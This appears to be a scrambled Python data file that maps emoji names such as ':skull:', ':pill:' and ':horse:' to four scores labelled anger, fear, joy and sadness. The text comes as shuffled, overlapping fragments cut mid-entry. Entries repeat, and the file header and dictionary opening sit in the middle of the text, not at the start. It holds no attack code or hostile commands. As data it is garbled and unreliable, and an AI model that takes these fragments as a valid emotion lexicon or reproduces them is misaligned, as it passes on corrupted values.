[0.292,", "0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\":", "0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239,", "\":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19,", "0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15,", "0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069,", "0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19],", "0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\":", "\":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172,", "0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184,", "\":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171,", "0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105,", "0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\":", "0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29,", "0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\":", "0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\":", "\":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289,", "[0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127,", "0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\":", "0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165],", "0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141,", "0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415,", "0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999,", "0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\":", "0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183,", "0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126,", "0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002],", "[0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276,", "\":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284,", "0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27,", "0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25],", "0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299],", "0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213,", "0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299],", "0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205],", "0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257,", "0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996],", "0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\":", "0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003,", "\":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003,", "[0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001,", "0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998,", "\":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188,", "0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\":", "\":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22,", "0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\":", "0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192,", "[0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278,", "0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127,", "0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321,", "0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998,", "[0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355,", "0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003],", "0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\":", "0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139,", "0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25,", "0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075,", "0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192],", "0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299,", "0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165,", "\":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159,", "0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\":", "\":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998,", "0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121],", "0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\":", "[0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048,", "0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\":", "[0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336,", "0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\":", "[0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152,", "0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259],", "[0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995,", "0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997,", "0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\":", "[0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998,", "0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002],", "\":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249,", "0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225],", "[0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087,", "0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127,", "\":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003,", "[0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086,", "0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091,", "[0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146,", "0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\":", "[0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237,", "0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156,", "[0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078,", "\":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306,", "0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184],", "\":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002,", "0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002,", "[0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196,", "0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\":", "\":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259,", "\":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239,", "\":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003,", "0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251,", "[0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168,", "0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086],", "0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\":", "[0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002,", "[0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253,", "0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221,", "[0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251,", "0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188,", "\":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159,", "\":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003,", "0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212,", "[0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46,", "0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13,", "0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\":", "0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127,", "<gh_stars>1-10 # anger, fear, joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001,", "0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\":", "[0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332,", "0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152],", "[0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158,", "0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002,", "0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\":", "[0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003,", "\":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067,", "\":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214,", "0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998],", "0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002],", "0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168,", "0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204],", "[0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138,", "[0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09,", "\":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385,", "0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998],", "[0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001,", "\":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14,", "[0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264,", "\":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258,", "0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151,", "[0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001,", "0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002,", "\":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122,", "0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242],", "[0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215,", "0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\":", "0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\":", "[0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314,", "0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\":", "\":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16,", "[0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002,", "0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\":", "0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24],", "0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36],", "0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177,", "0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13,", "0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\":", "[0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081,", "0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002,", "0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\":", "0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392],", "[0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998,", "0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\":", "0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\":", "\":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196,", "0.113, 0.228], \":Taurus:\": 